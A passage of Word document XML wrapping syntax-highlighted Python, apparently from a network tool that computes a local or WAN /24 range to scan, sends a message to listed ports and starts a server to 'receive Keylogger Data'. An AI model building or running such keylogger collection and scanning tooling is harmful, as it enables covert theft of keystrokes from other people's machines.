      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>nowaitresponse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">327  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">timeout </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>timeout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">328  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">enable_server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>enableserver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">329  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">server_port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>serverport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">330  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">331  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Host info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">332  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>gethostname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">333  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">localip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>gethostbyname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">334  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">externalip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>get_external_ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">335  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">336  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s3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337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38  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Verbose level '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>VERBOSE_LEVELS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>verbose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>]))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">339  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">net_range </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">"" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">and not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>wan_auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">340  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">net_range </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ip_to_cidr24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>localip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">341  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Network range to scan (local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2  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">elif </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">net_range </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">"" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>wan_auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">343  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">net_range </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ip_to_cidr24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>externalip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">344  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Network range to scan (wan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5  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">346  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Network range to scan '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>net_range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">347  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Ports list '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>port_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">348  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Message to send </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s51"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s51"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">349  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Wait response after send message '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>waitresponse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">350  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Timeout %d seconds' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">351  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>enable_server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">352  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Enabled Server to receive Keylogger Data at port %s' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>server_port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">353  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">354  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">listen_server_instance </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ListenServer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>HOST_BIND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>server_port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>MAX_CLIENTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>BUFFER_SIZE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">355  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
